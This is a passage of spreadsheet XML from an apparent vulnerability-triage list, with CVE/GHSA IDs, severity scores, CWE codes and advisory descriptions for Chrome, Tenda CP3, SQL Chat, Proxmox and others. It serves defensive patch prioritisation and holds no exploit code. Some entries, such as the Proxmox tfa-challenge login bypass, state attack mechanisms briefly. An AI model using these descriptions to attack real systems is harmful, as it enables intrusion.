      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84352</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84352</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84353</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>Use after free in Shared Tab Groups in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84353</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85042</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85042</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85047</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Transactions Platform in Google Chrome on on iOS prior to 152.0.7977.82 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85047</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85050</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85050</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85085</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App before 2.376.0 allowed an external origin to be loaded in a privileged WebView. A threat actor who controls the page loaded by the user is able to communicate with Canva using the user’s session.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85085</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M120" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr"/>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-1395</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.
Until a fix has propagated, optimization of AVIF files is disabled.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52777</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-502</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, there is an authenticated PHP object injection vulnerability in BazarImportAction via unserialize. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52777</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75925</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of CRLF sequences in IXON VPN Client before version 1.4.7 allows an attacker to execute commands as root or SYSTEM. Configuration values accepted by the local service are written to a file later consumed by a privileged subprocess, without line-ending sequences being neutralized, which allows additional directives to be introduced into that file. The configuration interface accepts changes without authenticating or verifying the origin of the requester. The injected configuration persists on disk across restarts of the client and the operating system, and the VPN connection continues to function normally, so there is no behavioral change visible to the user.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75925</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R123"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S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78683</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr"/>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82533</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R125"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S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86123</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>SQL Chat contains four unauthenticated API endpoints that accept client-supplied database connection parameters and execute arbitrary SQL queries against attacker-specified hosts. Attackers can connect to internal databases, execute SQL commands, enumerate schemas, and pivot into the server's network without authentication.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86123</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86148</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Tenda CP3 27.5.57.101. This vulnerability affects the function SystemAsh of the file Apis/system.c of the component Kylin. The manipulation of the argument AlarmVoiceURL results in os command injection. It is possible to launch the attack remotely.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86148</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86149</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Tenda CP3 27.5.57.101. This issue affects some unknown processing of the file Net/NetCheckPing.cpp. This manipulation of the argument interface_name/host causes os command injection. The attack can be initiated remotely.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86149</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86153</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Tenda CP3 27.5.57.101. This affects the function CRedirServer::SetRedirectEnable of the file Functions/Redirect.cpp. The manipulation leads to improper privilege management. Remote exploitation of the attack is possible.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86153</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54391</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>Proxmox Virtual Environment (VE) 7.0 through 8.0 contains an authentication bypass vulnerability in libpve-access-control before 8.0.4 that allows unauthenticated attackers to authenticate as any existing enabled user without a configured second factor by supplying an arbitrary tfa-challenge value in the API login endpoint. Attackers can send a POST request to the access ticket API endpoint with any value in the tfa-challenge parameter to completely skip password verification, gaining unauthorized access including to the root@pam account. All affected releases are end of life.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54391</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58376</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
